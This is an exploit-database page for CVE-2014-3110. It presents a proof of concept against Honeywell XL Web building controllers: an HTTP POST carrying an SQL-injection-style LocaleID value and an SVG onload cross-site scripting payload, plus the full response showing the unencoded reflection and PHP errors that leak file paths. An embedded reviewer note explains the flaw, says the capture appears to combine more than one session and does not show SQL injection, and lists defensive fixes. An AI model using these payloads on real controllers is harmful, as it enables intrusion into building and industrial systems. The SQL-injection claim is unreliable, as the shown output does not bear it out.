
Honeywell XL Web Controller Cross Site Scripting / SQL Injection

🗓️ 24 May 2018 00:00:00 · Reported by t4rkd3vilz · Type: packetstorm
🔗 packetstormsecurity.com · 👁 49 Views

Honeywell XL Web Controller Cross Site Scripting / SQL Injection

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Honeywell XL Web Controller - Cross-Site Scripting Vulnerability
24 May 201800:00
zdt
CVE
CVE-2014-3110
24 Jul 201414:00
cve
Cvelist
CVE-2014-3110
24 Jul 201414:00
cvelist
Exploit DB
Honeywell XL Web Controller - Cross-Site Scripting
24 May 201800:00
exploitdb
EUVD
EUVD-2014-3131
7 Oct 202500:30
euvd
exploitpack
Honeywell XL Web Controller - Cross-Site Scripting
24 May 201800:00
exploitpack
ICS
Honeywell FALCON XLWeb Controllers Vulnerabilities
27 Mar 201406:00
ics
NVD
CVE-2014-3110
24 Jul 201414:55
nvd
Prion
Cross site scripting
24 Jul 201414:55
prion
`# Exploit Title: Honeywell XL Web Controller SQLi & XSS  
# Date: 2018-05-24  
# Exploit Author: t4rkd3vilz  
# Vendor Homepage: https://www.honeywell.com  
# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB  
104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O,  
XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL,  
XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL.  
# Tested on: Linux  
# CVE: CVE-2014-3110  
  
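--------------- ---> Proof Of Concept <--------------------------  
# Reviewer note: the POST below places markup in the login form fields, and  
# the response that follows echoes a Locale value into the inline script's  
# URL strings and the hidden LocaleID input without HTML encoding; that  
# unencoded reflection is the cross-site scripting issue. The hidden input  
# in the response carries a different, scanner-style test string than the  
# request shown, so the transcript appears to combine more than one capture.  
# The response shows PHP type warnings and notices (which also disclose  
# server-side file paths) rather than a database error, so it does not by  
# itself demonstrate the SQL injection named in the title. Defensive  
# takeaways: validate LocaleID as an integer server-side, HTML-encode every  
# reflected value, and turn off display of PHP errors on the device.  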
  
POST /standard/mainframe.php HTTP/1.1  
Cache-Control: no-cache  
Referer: http://TargetIP/standard/mainframe.php  
Accept: text/xml,application/xml,application/xhtml+xml,text/  
html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,  
like Gecko) Chrome/41.0.2272.16 Safari/537.36  
Accept-Language: en-us,en;q=0.5  
Cookie: Locale=1033  
Accept-Encoding: gzip, deflate  
Content-Length: 222  
Content-Type: application/x-www-form-urlencoded  
  
SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/><svg/  
onload=prompt(/XSS/)>  
&LoginPasswordMD5=&LoginCommand=&LoginPassword=&  
rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest  
  
HTTP/1.1 200 OK  
Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02  
GMT; path=/  
Server: Apache/1.3.23 (Unix) PHP/4.4.9  
X-Powered-By: PHP/4.4.9  
Content-Type: text/html  
Transfer-Encoding: chunked  
Date: Thu, 24 May 2018 08:54:03 GMT  
  
<br />  
<b>Warning</b>: xw_get_users() expects parameter 1 to be long, string  
given in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line  
<b>97</b><br />  
<br />  
<b>Warning</b>: xml_load_texts_file() expects parameter 2 to be long,  
string given in <b>/mnt/mtd6/xlweb/web/standard/include/elements.php</b> on  
line <b>247</b><br />  
<html>  
<head>  
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>  
<meta http-equiv="expires" content="0"/>  
<link rel="stylesheet" href="include/honeywell.css"/>  
<title><br />  
<b>Notice</b>: Undefined index: HeadTitle in <b>/mnt/mtd6/xlweb/web/  
standard/login/loginpage.php</b> on line <b>300</b><br />  
</title>  
<script language="JavaScript">  
<!--  
  
var NS4 = document.layers;  
  
// if the selected element has alarms, the element within the  
// drop Down-list should be styled red.  
// This is done for firefox which does not accept even the  
// usage of inline styles.  
function setOptionColor() {  
if(document.getElementById("LoginSelect") != null) {  
var selectionBox = document.getElementById("LoginSelect");  
var selectedElement = selectionBox.selectedIndex;  
var selectedOption = selectionBox.options[selectedElement];  
if(selectedOption.getAttribute("class") != null) {  
var className = selectedOption.getAttribute("class");  
if(className == "red") {  
selectionBox.style.color = "#FF0000";  
}  
}  
}  
  
}  
  
function onSessionChange (sSessionID, sLocaleID)  
{  
document.forms.main.elements["SessionID"].value = sSessionID;  
document.forms.main.elements["LocaleID"].value = sLocaleID;  
submitCommand ("ChangeSession");  
}  
  
function onDeviceListChange ()  
{  
submitCommand ("UpdateDeviceList");  
}  
  
function onSessionCreated (sResult, sSessionID)  
{  
if (sResult != "4194561")  
{  
if (sResult == "196626")  
{  
alert ("<br />  
*<b>Notice</b>: Undefined index: CreateSessionFailed in  
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line  
<b>346</b><br />*  
*\n" +*  
"\n" +  
"<br />  
*<b>Notice</b>: Undefined index: TooManyUsers in  
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line  
<b>348</b><br />*  
*");*  
}  
else  
{  
alert ("<br />  
*<b>Notice</b>: Undefined index: CreateSessionFailed in  
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line  
<b>352</b><br />*  
*\n" +*  
"\n" +  
"<br />  
*<b>Notice</b>: Undefined index: OperationalProblem in  
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line  
<b>354</b><br />*  
*");*  
}  
return;  
}  
var sUserName = document.forms.main.elements["LoginUserName"].value;  
var sPassword = calcMD5 (document.forms.main.elements[  
"LoginPassword"].value);  
sPassword = calcMD5 (sSessionID + sUserName + sPassword);  
sUserName = calcMD5 (sUserName);  
document.forms.main.elements["LoginSessionID"].value = sSessionID;  
document.forms.main.elements["LoginUserNameMD5"].value = sUserName;  
document.forms.main.elements["LoginPasswordMD5"].value = sPassword;  
submitCommand ("Login");  
}  
  
function showHelp (sHelpID)  
{  
var lWidth = 360;  
var lHeight = 320;  
var lLeft = (screen.width - lWidth) / 2;  
var lTop = (screen.height - lHeight) / 2;  
openDependent (*"login/help.php?Locale="/><svg/onload=prompt(/XSS/)>*  
&ID=" + sHelpID,  
"Help",  
"width=" + lWidth + ",height=" + lHeight + ",left=" +  
lLeft + ",top=" + lTop + ",scrollbars=yes,resizable=yes");  
}  
  
function submitCommand (sCommand)  
{  
//document.forms.main.elements["LoginPassword"].value = "";  
document.forms.main.elements["LoginCommand"].value = sCommand;  
document.forms.main.submit ();  
}  
  
function checkEnter (event)  
{  
var lkeyCode = 0;  
if (NS4)  
{  
lkeyCode = event.which;  
}  
else  
{  
lkeyCode = event.keyCode;  
}  
if (lkeyCode == 13)  
{  
createSession ();  
  
}  
  
}  
  
function changeDevice ()  
{  
var oOptions = document.forms.main.elements["  
LoginDevice"].options;  
for (var lIndex = 0; lIndex < oOptions.length; lIndex++)  
{  
if (oOptions[lIndex].selected)  
{  
var sURL = "http://" + oOptions[lIndex].value;  
sURL += ":80";  
sURL += "/standard/";  
sURL += "default.php?Locale="/><svg/onload=prompt(/XSS/)>  
";  
parent.parent.window.location.replace (sURL);  
return;  
}  
}  
}  
  
function createSession ()  
{  
if (top.frames.updateframe &&  
top.frames.updateframe.createSession)  
{  
top.frames.updateframe.createSession ();  
  
}  
else  
{  
var lLeft = screen.width;  
var lTop = screen.height;  
var oWindow = open ("login/session.php",  
"Session",  
"width=0,height=0,left=" + lLeft + ",top=" +  
lTop + ",dependent=yes,locationbar=no,menubar=no,status=no,scrollbars=no");  
}  
}  
  
function onLoad ()  
{  
if (top.frames.updateframe)  
{  
top.frames.updateframe.location.replace ("login/update.php");  
}  
document.main.LoginUserName.focus ();  
}  
//-->  
</script>  
<script type="text/javascript" src="scripts/md5.js"></script>  
</head>  
  
<body onload="setOptionColor()" class="colored" onLoad="onLoad ();"  
style="background-image: url(images/bg_headline_dialog.gif);  
background-repeat:repeat-x;">  
<form name="main" method="post" action="/standard/mainframe.php">  
<input type="hidden" name="SessionID"/>  
<input type="hidden" name="LocaleID" value="'"--></  
style></scRipt><scRipt>netsparker(0x0001AA)</scRipt>"/>  
<input type="hidden" name="rememberMeCheck" value=""/>  
<input type="hidden" name="LoginSessionID"/>  
<input type="hidden" name="LoginUserNameMD5"/>  
<input type="hidden" name="LoginPasswordMD5"/>  
<input type="hidden" name="LoginCommand"/>  
  
<!-- *******************************************************************  
-->  
<!-- * Controller Name  
* -->  
<!-- *******************************************************************  
-->  
<table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr><td bgcolor="#7F7F7F"><img alt=""  
src="images/blank.gif" width="1" height="1"/></td></tr>  
<tr><td bgcolor="#000000"><img alt="" src="images/blank.gif"  
width="1" height="1"/></td></tr>  
<tr>  
<td class="headline" height="16" nowrap="">  
&nbsp;AUM0_MUSEO_LANA.XLWEB_MUSEO_LANA.<br />  
<b>Notice</b>: Undefined index: Title in <b>/mnt/mtd6/xlweb/web/  
standard/login/loginpage.php</b> on line <b>509</b><br />  
</td>  
</tr>  
</table>  
  
<table width="100%" height="75%" border="0" cellpadding="0"  
cellspacing="0">  
<tr>  
<td width="50%">&nbsp;</td>  
<td>  
<table border="0" cellspacing="7" cellpadding="0">  
<!-- ******************************  
************************************* -->  
<!-- * Custom image  
* -->  
<!-- ******************************  
************************************* -->  
<tr>  
<td>  
<table width="100%" border="0" cellpadding="0"  
cellspacing="0">  
<tr>  
<td align="center">  
<img alt="" src="login/loginlogo.gif"  
/>  
</td>  
</tr>  
<tr><td><img alt="" src="images/blank.gif" width="1"  
height="7"/></td></tr>  
</table>  
</td>  
</tr>  
  
<!-- ******************************  
************************************* -->  
<!-- * Login group  
* -->  
<!-- ******************************  
************************************* -->  
<tr>  
<td>  
<br />  
<b>Notice</b>: Undefined index: Login in <b>/mnt/mtd6/xlweb/web/  
standard/login/loginpage.php</b> on line <b>596</b><br />  
<br />  
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/  
standard/login/loginpage.php</b> on line <b>597</b><br />  
<table width="100%" border="0" cellspacing="0" cellpadding="0"  
bgcolor="#B8D7F0">  
<tr>  
<td><img alt="" src="images/group_left_top.gif" width="5"  
height="5"/></td>  
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>  
<td align="right"><img alt="" src="images/group_right_top.gif"  
width="5" height="5"/></td>  
</tr>  
<tr>  
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>  
<td width="100%" valign="top">  
<table width="100%" border="0" cellspacing="0" cellpadding="2">  
<tr>  
<td colspan="2" class="groupheader" nowrap="">  
<b></b>  
</td>  
<td align="right">  
&nbsp;  
</td>  
</tr>  
<tr>  
<td>&nbsp;</td>  
<td width="100%">  
<table border="0" cellpadding="1" cellspacing="1">  
<tr>  
<td nowrap=""><br />  
<b>Notice</b>: Undefined index: Controller in <b>/mnt/mtd6/xlweb/web/  
standard/login/loginpage.php</b> on line <b>605</b><br />  
:&nbsp;</td>  
<td>  
  
<select id="LoginSelect" class="loginSelect"  
name="LoginDevice" onchange="changeDevice ();" style="width:150px;">  
<option  
selected="" value="192.168.1.12"  
class="red" style="color:#FF0000;  
background-color:#D8E8F8">  
XLWEB_MUSEO_LANA  
</option>  
</select>  
</td>  
<td>&nbsp;</td>  
<td align="right">  
<img alt="" name="LoginAlarm"  
src="footer/alarm_red_tr.gif"> </td>  
</tr>  
<tr>  
<td nowrap=""><br />  
<b>Notice</b>: Undefined index: UserName in <b>/mnt/mtd6/xlweb/web/  
standard/login/loginpage.php</b> on line <b>632</b><br />  
:&nbsp;</td>  
<td>  
<select name="LoginUserName" style="width:150px;">  
<br />  
<b>Warning</b>: Invalid argument supplied for foreach() in  
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line  
<b>650</b><br />  
</select>  
  
</td>  
  
</tr>  
<tr>  
<td nowrap=""><br />  
<b>Notice</b>: Undefined index: Password in <b>/mnt/mtd6/xlweb/web/  
standard/login/loginpage.php</b> on line <b>689</b><br />  
:&nbsp;</td>  
<td>  
<!--<input type="password" class="text" name="LoginPassword"  
style="width:150px;" onKeyPress="checkEnter (event)"/>-->  
<input name="LoginPassword" type="password" onKeyDown="checkEnter (event)"  
size="25" class="ppinput" value=""/>  
</td>  
</tr>  
<tr>  
<td><br />  
<b>Notice</b>: Undefined index: RememberMeCheckbox in  
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line  
<b>720</b><br />  
</td>  
<td><input id="rememberMeCheck" name="rememberMeCheck" type="checkbox"  
/></td>  
</tr>  
<tr>  
<td><img alt="" src="images/blank.gif" width="90"  
height="2"/></td>  
<td><img alt="" src="images/blank.gif" width="1"  
height="2"/></td>  
</tr>  
</table>  
</td>  
<td>&nbsp;</td>  
</tr>  
</table>  
</td>  
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>  
</tr>  
<tr>  
<td><img alt="" src="images/group_left_bottom.gif" width="5"  
height="5"/></td>  
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>  
<td align="right"><img alt="" src="images/group_right_bottom.gif"  
width="5" height="5"/></td>  
</tr>  
</table>  
</td>  
</tr>  
  
<!-- ******************************  
************************************* -->  
<!-- * Button  
* -->  
<!-- ******************************  
************************************* -->  
<tr>  
<td>  
<table border="0" cellspacing="7" cellpadding="0">  
<tr>  
<td>  
<br />  
<b>Notice</b>: Undefined index: LoginButton in <b>/mnt/mtd6/xlweb/web/  
standard/login/loginpage.php</b> on line <b>750</b><br />  
<br />  
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/  
standard/login/loginpage.php</b> on line <b>751</b><br />  
<table border="0" cellspacing="0" cellpadding="0" >  
<tr>  
<td><img alt="" src="images/buttonleft.gif" width="7"  
height="18"/></td>  
<td background="images/buttonmiddle.gif" nowrap=""><a  
class="button" href="JavaScript:createSession ();" title=""></a></td>  
<td><img alt="" src="images/buttonright.gif" width="7"  
height="18"/></td>  
</tr>  
</table>  
</td>  
</tr>  
</table>  
</td>  
</tr>  
</table>  
</td>  
<td width="50%">&nbsp;</td>  
</tr>  
</table>  
</form>  
</body>  
</html>  
`
